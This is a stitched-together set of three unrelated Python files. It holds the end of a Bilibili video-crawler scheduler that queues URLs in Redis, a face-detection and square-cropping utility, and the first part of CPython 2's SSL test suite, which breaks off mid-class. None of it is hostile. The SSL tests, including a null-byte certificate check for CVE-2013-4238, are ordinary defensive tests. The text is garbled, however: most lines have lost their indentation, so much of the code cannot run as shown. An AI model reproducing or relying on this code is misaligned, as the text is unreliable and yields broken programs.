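# Note: rpush appends to the tail of the Redis list and lpush prepends to the
# head, so - assuming the spiders pop start URLs from the left - the priority*
# helpers above are consumed before regularly queued requests.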
def sendSiteInfoCrawlRequest():
redis_connection.rpush(SITEINFO_KEY, SITEINFO_URL)
def add_tag_task():
    task_name = "生成待爬标签视频链接"  # generate crawl links for videos that still lack tags
    coll = db['video']
    doc_filter = {'tag': {'$exists': False}}
    total = coll.count_documents(doc_filter)
    cursor = coll.find(doc_filter, {"aid": 1}).batch_size(100)
    url = 'https://www.bilibili.com/video/av{}'
    for each_video in cursor:
        aid = each_video['aid']
        logger.info("aid pending crawl: {}".format(aid))
        redis_connection.rpush("tagAdder:start_urls", url.format(aid))
def auto_crawl_task():
task_name = "自动爬虫计划调度服务"
logger.info(task_name)
ExistsTask(task_name, update_frequency=60, collection=db['tracer'])
while True:
schedule.run_pending()
sleep(60)
def gen_online():
task_name = "生成在线人数爬取链接"
ONLINE_URL = 'https://www.bilibili.com/video/online.html'
redis_connection.rpush("online:start_urls", ONLINE_URL)
def run_threaded(job_func):
job_thread = threading.Thread(target=job_func)
job_thread.start()
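# Each job is dispatched on its own thread so that a long-running job (such as
# a rank computation) does not block schedule.run_pending() in the main loop.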
def set_schedule():
# schedule.every().day.at('01:00').do(run_threaded, update_author)
schedule.every().day.at('07:00').do(run_threaded, update_video)
schedule.every().day.at('12:00').do(run_threaded, FansWatcher().watchBigAuthor)
# schedule.every().day.at('13:00').do(run_threaded, author_fans_rate_caculate)
schedule.every().day.at('14:00').do(run_threaded, auto_add_author)
# schedule.every().day.at('16:50').do(run_threaded, auto_crawl_bangumi)
schedule.every().day.at('22:00').do(run_threaded, auto_add_video)
# schedule.every().day.at('04:00').do(run_threaded, add_tag_task)
schedule.every().wednesday.at('03:20').do(
run_threaded, compute_video_rank_table)
schedule.every().monday.at('03:20').do(run_threaded, calculate_author_rank)
schedule.every().week.do(run_threaded, update_unfocus_video)
schedule.every().hour.do(run_threaded, sendSiteInfoCrawlRequest)
schedule.every(1).minutes.do(run_threaded, crawlOnlineTopListData)
schedule.every(15).minutes.do(run_threaded, gen_online)
if __name__ == "__main__":
set_schedule()
|
face_helper.py
|
#coding=utf-8
import face_recognition
from PIL import Image, ImageDraw
import numpy as np
import os
import argparse
import multiprocessing
import logging
SUPPORTED_IMAGE_EXT = ['.jpg', '.png']
def is_image_file(filename):
_, ext = os.path.splitext(filename)
if not ext.lower() in SUPPORTED_IMAGE_EXT:
return False
else:
return True
def find_faces(im, threshold=120):
ret_list = []
image = np.array(im.convert('RGB'))
# (top, right, bottom, left)
face_locations = face_recognition.face_locations(image)
logging.debug('face locations: {}'.format(face_locations))
for (top, right, bottom, left) in face_locations:
width = right-left
height = bottom-top
logging.debug('width: {}, height: {}'.format(width, height))
# minimum size
if width < threshold or height < threshold:
continue
ret_list.append((top, right, bottom, left))
return ret_list
def adjust_cropped_locations(width, height, locations):
cropped_locations = []
for (top, right, bottom, left) in locations:
#
face_height = bottom - top
face_width = right - left
logging.debug('face_height: {}, face_width: {}'.format(face_height, face_width))
#
new_top = top - face_height
top = new_top if new_top > 0 else 0
new_bottom = bottom + face_height
bottom = new_bottom if new_bottom < height else height
new_left = left - face_width
left = new_left if new_left > 0 else 0
new_right = right + face_width
right = new_right if new_right < width else width
#
face_height = bottom - top
face_width = right - left
logging.debug('[new] face_height: {}, face_width: {}'.format(face_height, face_width))
#
# adjust image location
if face_height > face_width:
gap = face_height - face_width
if top == 0:
bottom = bottom-gap
elif bottom == height:
top = top+gap
else:
bottom = bottom-int(gap/2)
top = top+int(gap/2)
else:
gap = face_width - face_height
if left == 0:
right = right-gap
elif right == width:
left = left+gap
else:
right = right-int(gap/2)
left = left+int(gap/2)
#
face_height = bottom - top
face_width = right - left
logging.debug('[adjusted] face_height: {}, face_width: {}'.format(face_height, face_width))
#
cropped_locations.append((top, right, bottom, left))
return cropped_locations
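# Illustrative example (made-up values): a 200x200 face at
# (top=500, right=600, bottom=700, left=400) inside a sufficiently large image
# is expanded by one face height/width on every side, giving the square crop
# (top=300, right=800, bottom=900, left=200), i.e. a 600x600 region centred on
# the face. Near the image border the box is clamped first and then re-squared.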
def draw_image_with_face_rectangle(image_path, locations):
im = Image.open(image_path)
width, height = im.size
locations = adjust_cropped_locations(width, height, locations)
draw = ImageDraw.Draw(im)
for (top, right, bottom, left) in locations:
#
draw.line((right, top, right, bottom), fill=128, width=10)
draw.line((left, top, right, top), fill=128, width=10)
draw.line((left, top, left, bottom), fill=128, width=10)
draw.line((left, bottom, right, bottom), fill=128, width=10)
im.show()
# Crop a square region (default 1024x1024) around the detected face in the image
def crop_square_by_face(image_path, output_dir, size=1024):
#
dir_path, filename = os.path.split(image_path)
filename_wo_ext, ext = os.path.splitext(filename)
_, dir_name = os.path.split(dir_path)
output_subdir = os.path.join(output_dir, dir_name)
if not os.path.exists(output_subdir):
os.makedirs(output_subdir)
#
im = Image.open(image_path)
width, height = im.size
logging.debug('width: {}, height: {}'.format(width, height))
face_locations = find_faces(im)
if len(face_locations) > 1:
        logging.info('more than one face found in the image, skipping {}'.format(image_path))
return
cropped_locations = adjust_cropped_locations(width, height, face_locations)
index = 1
for (top, right, bottom, left) in cropped_locations:
cropped_width = right-left
cropped_height = bottom-top
if cropped_width < size or cropped_height < size:
logging.info('cropped image size < {}, {}'.format(size, image_path))
continue
cropped_path = os.path.join(output_dir, dir_name, '{}_{}{}'.format(filename_wo_ext, index, ext))
im.crop((left, top, right, bottom)).resize((size,size)).save(cropped_path)
index += 1
def process_image_list(cpu_index, image_list, output_dir):
index = 0
last_image = ''
for image_path in image_list:
try:
index += 1
last_image = image_path
crop_square_by_face(image_path, output_dir)
        except Exception as e:
            logging.warning("exception in CPU {} when processing {}: {}".format(cpu_index, image_path, e))
logging.info("process_image_list done! CPU: {}, image_list length: {}, index: {}, last_image: {}".format(cpu_index, len(image_list), index, last_image))
def batch_crop_images(image_path, output_dir):
image_path_list = []
for root, _, files in os.walk(image_path):
for name in files:
image_path_list.append(os.path.join(root, name))
    process_image_list(0, image_path_list, output_dir)  # single worker, cpu_index 0
def crop_images(image_path, output_dir):
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if os.path.isfile(image_path):
crop_square_by_face(image_path, output_dir)
elif os.path.isdir(image_path):
batch_crop_images(image_path, output_dir)
else:
pass
def start_multi_processes(image_path, list_file_path, output_dir, cpu_count):
#
if not os.path.exists(output_dir):
os.makedirs(output_dir)
#
accomplished_file_list = []
if list_file_path and os.path.exists(list_file_path) and os.path.isfile(list_file_path):
with open(list_file_path, 'r') as fh:
for line in fh.readlines():
accomplished_file_list.append(line.strip())
#
image_list_group = []
for _ in range(0, cpu_count):
image_list_group.append([])
index = 0
count_in_accomplished_list = 0
for root, _, files in os.walk(image_path):
for name in files:
if not is_image_file(name):
continue
image_file_path = os.path.join(root, name)
if image_file_path in accomplished_file_list:
logging.debug('find in accomplished_file_list, {}'.format(image_file_path))
count_in_accomplished_list += 1
continue
image_list_group[index%cpu_count].append(image_file_path)
index += 1
logging.info('find {} in accomplished file list'.format(count_in_accomplished_list))
jobs = []
for i in range(0, cpu_count):
logging.info('index: {}, length: {}'.format(i, len(image_list_group[i])))
p = multiprocessing.Process(target=process_image_list, args=(i,image_list_group[i],output_dir,))
jobs.append(p)
p.start()
for p in jobs:
p.join()
print('[MD] Completed!')
def crop_images_multi_process(image_path, output_dir):
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if os.path.isfile(image_path):
crop_square_by_face(image_path, output_dir)
elif os.path.isdir(image_path):
batch_crop_images(image_path, output_dir)
else:
pass
#
def print_multi_faces_image(image_path):
im = Image.open(image_path)
count = len(find_faces(im, 1))
if count > 1:
        logging.info('more than one face in {}'.format(image_path))
def check_face_count_in_image(image_dir):
for root, _, files in os.walk(image_dir):
for name in files:
if not is_image_file(name):
continue
image_path = os.path.join(root, name)
logging.debug('process {}'.format(image_path))
print_multi_faces_image(image_path)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Command Usages')
parser.add_argument("-i", "--input", type=str, help="input")
parser.add_argument("-o", "--output", type=str, default="output_dir", help="output")
parser.add_argument("-d", "--draw", action="store_true", help="draw face rectangle in image")
parser.add_argument("-c", "--crop", action="store_true", help="crop face areas")
parser.add_argument("-p", "--cpu_count", type=int, default=0, \
help="cpu count for multiprocessing, default value is 0, which means all of cpu would be used")
parser.add_argument("-m", "--multi", action="store_true", help="print multiple faces in image")
parser.add_argument("-l", "--list_file", type=str, help="list file contains accomplished files")
args = parser.parse_args()
global_cpu_count = multiprocessing.cpu_count()
logging.basicConfig(filename='face_helper.log', level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
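    # Illustrative invocations (paths are placeholders):
    #   python face_helper.py -i ./photos -o ./cropped -c -p 4   # crop faces with 4 worker processes
    #   python face_helper.py -i ./photos -m                     # report images with more than one face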
if args.input and os.path.exists(args.input):
if args.draw:
im = Image.open(args.input)
locations = find_faces(im)
draw_image_with_face_rectangle(args.input, locations)
elif args.crop:
if args.cpu_count >= 0:
if args.cpu_count == 0:
cpu_count = global_cpu_count
elif args.cpu_count <= global_cpu_count:
cpu_count = args.cpu_count
else:
cpu_count = global_cpu_count
logging.info('start multiprocessing to crop images, process count = {}'.format(cpu_count))
start_multi_processes(args.input, args.list_file, args.output, cpu_count)
else:
logging.info('crop images in single process.')
# crop_images(args.input, args.output)
elif args.multi:
check_face_count_in_image(args.input)
else:
pass
else:
parser.print_help()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import test_support
import asyncore
import socket
import select
import time
import gc
import os
import errno
import pprint
import urllib, urlparse
import traceback
import weakref
import functools
import platform
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
ssl = test_support.import_module("ssl")
HOST = test_support.HOST
CERTFILE = None
SVN_PYTHON_ORG_ROOT_CERT = None
NULLBYTECERT = None
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if test_support.verbose:
sys.stdout.write(prefix + exc_format)
class BasicTests(unittest.TestCase):
def test_sslwrap_simple(self):
# A crude test for the legacy API
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET))
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET)._sock)
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
# We need to access the lower-level wrapper in order to create an
# implicit SSL context without trying to connect or listen.
try:
import _ssl
except ImportError:
# The returned function won't get executed, just ignore the error
pass
@functools.wraps(func)
def f(*args, **kwargs):
try:
s = socket.socket(socket.AF_INET)
_ssl.sslwrap(s._sock, 0, None, None,
ssl.CERT_NONE, ssl.PROTOCOL_SSLv2, None, None)
except ssl.SSLError as e:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')
and 'Invalid SSL protocol variant specified' in str(e)):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
#ssl.PROTOCOL_SSLv2
ssl.PROTOCOL_SSLv23
ssl.PROTOCOL_SSLv3
ssl.PROTOCOL_TLSv1
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
def test_random(self):
v = ssl.RAND_status()
if test_support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE, False)
if test_support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if test_support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if test_support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl.OPENSSL_VERSION_INFO >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_DER_to_PEM(self):
with open(SVN_PYTHON_ORG_ROOT_CERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, (int, long))
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 2.0
self.assertLess(n, 0x20000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 2)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 26)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by OpenSSL, the format might change
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t))
@test_support.requires_resource('network')
def test_ciphers(self):
remote = ("svn.python.org", 443)
with test_support.transient_internet(remote[0]):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL")
s.connect(remote)
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT")
s.connect(remote)
# Error checking occurs when connecting, because the SSL context
# isn't created before.
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
s.connect(remote)
@test_support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# The _delegate_methods in socket.py are correctly delegated to by an
# unconnected SSLSocket, so they will raise a socket.error rather than
# something unexpected like TypeError.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
self.assertRaises(socket.error, ss.recv, 1)
self.assertRaises(socket.error, ss.recv_into, bytearray(b'x'))
self.assertRaises(socket.error, ss.recvfrom, 1)
self.assertRaises(socket.error, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(socket.error, ss.send, b'x')
self.assertRaises(socket.error, ss.sendto, b'x', ('0.0.0.0', 0))
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with test_support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
s.connect(("svn.python.org", 443))
c = s.getpeercert()
if c:
self.fail("Peer cert %s shouldn't be here!")
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
try:
s.connect(("svn.python.org", 443))
except ssl.SSLError:
pass
finally:
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
s.connect(("svn.python.org", 443))
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with test_support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
self.assertEqual(0, s.connect_ex(("svn.python.org", 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with test_support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex(('svn.python.org', 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLError as err:
if err.args[0] == ssl.SSL_ERROR_WANT_READ:
select.select([s], [], [], 5.0)
elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
select.select([], [s], [], 5.0)
else:
raise
# SSL established
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with test_support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.settimeout(0.0000001)
rc = s.connect_ex(('svn.python.org', 443))
if rc == 0:
self.skipTest("svn.python.org responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_ex_error(self):
with test_support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
self.assertEqual(errno.ECONNREFUSED,
s.connect_ex(("svn.python.org", 444)))
finally:
s.close()
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with test_support.transient_internet("svn.python.org"):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect(("svn.python.org", 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with test_support.transient_internet("svn.python.org"):
s = socket.socket(socket.AF_INET)
s.connect(("svn.python.org", 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLError, err:
if err.args[0] == ssl.SSL_ERROR_WANT_READ:
select.select([s], [], [])
elif err.args[0] == ssl.SSL_ERROR_WANT_WRITE:
select.select([], [s], [])
else:
raise
s.close()
if test_support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
with test_support.transient_internet("svn.python.org"):
pem = ssl.get_server_certificate(("svn.python.org", 443),
ssl.PROTOCOL_SSLv23)
if not pem:
self.fail("No server certificate on svn.python.org:443!")
try:
pem = ssl.get_server_certificate(("svn.python.org", 443),
ssl.PROTOCOL_SSLv23,
ca_certs=CERTFILE)
except ssl.SSLError:
#should fail
pass
else:
self.fail("Got server certificate %s for svn.python.org!" % pem)
pem = ssl.get_server_certificate(("svn.python.org", 443),
ssl.PROTOCOL_SSLv23,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
if not pem:
self.fail("No server certificate on svn.python.org:443!")
if test_support.verbose:
sys.stdout.write("\nVerified certificate for svn.python.org:443 is\n%s\n" % pem)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
self.skipTest("remote host needs SNI, only available on Python 3.2+")
# NOTE: https://sha2.hboeck.de is another possible test host
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with test_support.transient_internet("sha256.tbs-internet.com"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=sha256_cert,)
try:
s.connect(remote)
if test_support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock):
self.server = server
self.running = False
self.sock = connsock
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def show_conn_details(self):
if self.server.certreqs == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if test_support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if test_support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if test_support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
def wrap_conn(self):
try:
self.sslconn = ssl.wrap_socket(self.sock, server_side=True,
certfile=self.server.certificate,
ssl_version=self.server.protocol,
ca_certs=self.server.cacerts,
cert_reqs=self.server.certreqs,
ciphers=self.server.ciphers)
except ssl.SSLError as e:
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " +
str(self.sock.getpeername()) + ":\n")
self.close()
self.running = False
self.server.stop()
return False
else:
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock._sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if isinstance(self.sock, ssl.SSLSocket):
self.sslconn = self.sock
elif not self.wrap_conn():
return
self.show_conn_details()
while self.running:
try:
msg = self.read()
if not msg:
# eof, so quit this handler
self.running = False
self.close()
elif msg.strip() == 'over':
if test_support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif self.server.starttls_server and msg.strip() == 'STARTTLS':
if test_support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write("OK\n")
if not self.wrap_conn():
return
elif self.server.starttls_server and self.sslconn and msg.strip() == 'ENDTLS':
if test_support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write("OK\n")
self.sslconn.unwrap()
self.sslconn = None
if test_support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
else:
if (test_support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %s (%s), sending back %s (%s)...\n"
% (repr(msg), ctype, repr(msg.lower()), ctype))
self.write(msg.lower())
except ssl.SSLError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
wrap_accepting_socket=False, ciphers=None):
if ssl_version is None:
ssl_version = ssl.PROTOCOL_TLSv1
if certreqs is None:
certreqs = ssl.CERT_NONE
self.certificate = certificate
self.protocol = ssl_version
self.certreqs = certreqs
self.cacerts = cacerts
self.ciphers = ciphers
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.flag = None
if wrap_accepting_socket:
self.sock = ssl.wrap_socket(self.sock, server_side=True,
certfile=self.certificate,
cert_reqs = self.certreqs,
ca_certs = self.cacerts,
ssl_version = self.protocol,
ciphers = self.ciphers)
if test_support.verbose and self.chatty:
sys.stdout.write(' server: wrapped server socket as %s\n' % str(self.sock))
self.port = test_support.bind_port(self.sock)
self.active = False
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if test_support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ str(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
asyncore.dispatcher_with_send.__init__(self, conn)
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
self._ssl_accepting = True
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError, err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except socket.error, err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if data and data.strip() != 'over':
self.send(data.lower())
def handle_close(self):
self.close()
if test_support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = test_support.bind_port(self.socket)
self.listen(5)
def handle_accept(self):
sock_obj, addr = self.accept()
if test_support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if test_support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if test_support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if test_support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start(self, flag=None):
